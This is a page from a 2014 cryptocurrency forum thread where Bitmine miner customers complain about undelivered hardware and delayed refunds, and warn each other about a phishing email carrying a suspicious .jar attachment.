I'm checking my computer for a virus infection. Don't try open the attached file.

That company is realy bad Embarrassed

matt4054

legendary

Activity: 1946

Merit: 1035

Quote from: Karlog on August 14, 2014, 09:39:27 AM

Did anyone else recive an invoice from bitmine today?

I just got a blank mail with subject: Invoice Payment

and a .jar file witch i don't know what to do with.

... i hope its about my refund..

I just received the virus as well in my inbox.

So, Bitmine has been hacked and customer data leaked. Well done. Yay Undecided

Sender's IP can be traced back to T-Mobile USA. If I get bored maybe I'll care to dissect the JAR in a fully insulated VM. The funny thing is, when you try to report it to [email protected], you get blocked from their mail exchanger with:

Code:

Diagnostic-Code: smtp; 550 5.7.1 Virus found.

So, their ABUSE address is filtering INBOUND messages, while their OUTBOUND servers let them through. Yay Undecided

Collider

hero member

Activity: 714

Merit: 500

jar are java executable and could contain a virus.

Karlog

member

Activity: 66

Merit: 10

Did anyone else recive an invoice from bitmine today?

I just got a blank mail with subject: Invoice Payment

and a .jar file witch i don't know what to do with.

... i hope its about my refund..

kapanec

newbie

Activity: 24

Merit: 0

Quote from: Dino50 on August 13, 2014, 03:27:24 PM

I think the basic problem at bitmine now is that they expected that btc price will skyrocket to 10.000 USD or so but so far it has not so this could be one reason they have liquid money problem and now they dont intend to sell their btc-s and pay Us. However the interesting story for Me is that why did they invest 3 M USD worth of equipment in the past couple months then.
Btw I have been also waiting for my cash since May. Very very annoying. Of course cash is the only good option to forget this terrible company. No other alternative can be accepted.

So they say, but we have good reason to doubt this

If I have 3 M in cash and 400 K debt I will pay debt at first and invest the rest. This is reasonable.

RealMalatesta

legendary

Activity: 2338

Merit: 1124

Quote from: johny08 on August 13, 2014, 03:12:17 PM

Quote from: Ultros on August 13, 2014, 04:07:49 AM

Datacenter is supposed to be ready in 2 days. Let's see how it turns out. Laugh at me all you want but I'm still kinda optimistic. That's probably the summer.

is it profitable?

You're like someone who asks if the baby will be a boy or a girl before having sex.

Dino50

newbie

Activity: 42

Merit: 0

I think the basic problem at bitmine now is that they expected that btc price will skyrocket to 10.000 USD or so but so far it has not so this could be one reason they have liquid money problem and now they dont intend to sell their btc-s and pay Us. However the interesting story for Me is that why did they invest 3 M USD worth of equipment in the past couple months then.
Btw I have been also waiting for my cash since May. Very very annoying. Of course cash is the only good option to forget this terrible company. No other alternative can be accepted.

johny08

legendary

Activity: 1045

Merit: 1000

Quote from: Ultros on August 13, 2014, 04:07:49 AM

Datacenter is supposed to be ready in 2 days. Let's see how it turns out. Laugh at me all you want but I'm still kinda optimistic. That's probably the summer.

is it profitable?

crocko

hero member

Activity: 826

Merit: 1000

'All that glitters is not gold'

Quote from: Ultros on August 13, 2014, 04:07:49 AM

Datacenter is supposed to be ready in 2 days. Let's see how it turns out. Laugh at me all you want but I'm still kinda optimistic. That's probably the summer.

Yea, they will start to mine and earn Bitcoins with our undelivered equipment .. Tongue

BTW, in my country,which is member of EU, the Bitmine.ch's partner BlackElectronics is pursued in justice and some of their members are hunted down right now by the Police.. Short story: they fail to deliver some very expensive ($5000 per TH/s) and modified ASICs with Bitmine.ch A1 chips, then they refused/delayed the refunds.

Topic: Official BITMINE CoinCraft series 28nm ASIC miners thread - page 27. (Read 565248 times)